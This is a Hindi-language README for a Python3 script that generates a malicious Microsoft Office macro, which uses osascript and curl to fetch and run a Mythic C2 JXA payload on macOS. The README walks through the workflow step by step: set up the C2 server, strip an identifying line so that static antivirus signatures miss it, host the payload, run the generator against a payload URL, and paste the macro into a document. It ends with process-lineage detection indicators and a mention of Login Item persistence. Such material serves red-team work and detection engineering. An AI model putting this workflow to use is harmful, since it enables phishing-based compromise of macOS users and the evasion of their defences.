
Python3 स्क्रिप्ट जो Mythic पेलोड लॉन्च करने के लिए मैक्रो जनरेट करती है। लेखक: Cedric Owens
Mythic JXA पेलोड लॉन्च करने के लिए MS Office मैक्रो जनरेट करने वाला Python3 स्क्रिप्ट।
यह स्क्रिप्ट एक Office मैक्रो जनरेट करता है जो Mythic JXA .js पेलोड को डाउनलोड और निष्पादित करने के लिए osascript का उपयोग करता है।
चरण:
Mythic C2 सर्वर सेट करें और एक "apfell" jxa पेलोड जनरेट करें (नोट: यह जनरेटर मानता है कि पेलोड http का उपयोग कर रहा है, https नहीं... यदि आप https का उपयोग कर रहे हैं, तो आप जनरेटर स्क्रिप्ट में curl को https का उपयोग करने के लिए संशोधित कर सकते हैं)। उस पेलोड को Mythic सर्वर पर डाउनलोड करें।
Mythic JXA .js लॉन्चर की पहली पंक्ति ("// Created by Cody Thomas - @its_a_feature_") हटा दें। कुछ स्थिर A/V सिग्नेचर इस स्थिर स्ट्रिंग की जांच करने के लिए जाने जाते हैं। उस पेलोड को होस्ट करें (उदा: .js पेलोड को एक फ़ोल्डर में रखें और होस्ट करने के लिए python -m SimpleHTTPServer का उपयोग करें)।
इस मैक्रो जनरेटर को चलाएं:
python3 jxa-macro.py -u [ऊपर #2 में होस्ट किए गए .js पेलोड का URL]
उदाहरण: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js
मैक्रो टेक्स्ट उसी निर्देशिका में "macro.txt" नामक फ़ाइल में ड्रॉप हो जाएगा।
उस मैक्रो को कॉपी करके MS Office डॉक में पेस्ट करें।
पहचान (Detection):
यह मैक्रो निम्नलिखित पैरेंट-चाइल्ड संबंध उत्पन्न करता है जो पहचान के लिए उपयोग किए जा सकते हैं:
Office Product (उदा: Microsoft Word.app) --> /bin/sh
Office Product (उदा: Microsoft Word.app) --> /bin/bash
Office Product (उदा: Microsoft Word.app) --> /usr/bin/curl
नोट: यह JXA पेलोड को App Sandbox के अंदर लॉन्च करेगा। हालांकि, Mythic में App Sandbox से भी Login Item पर्सिस्टेंस जोड़ने की क्षमता है।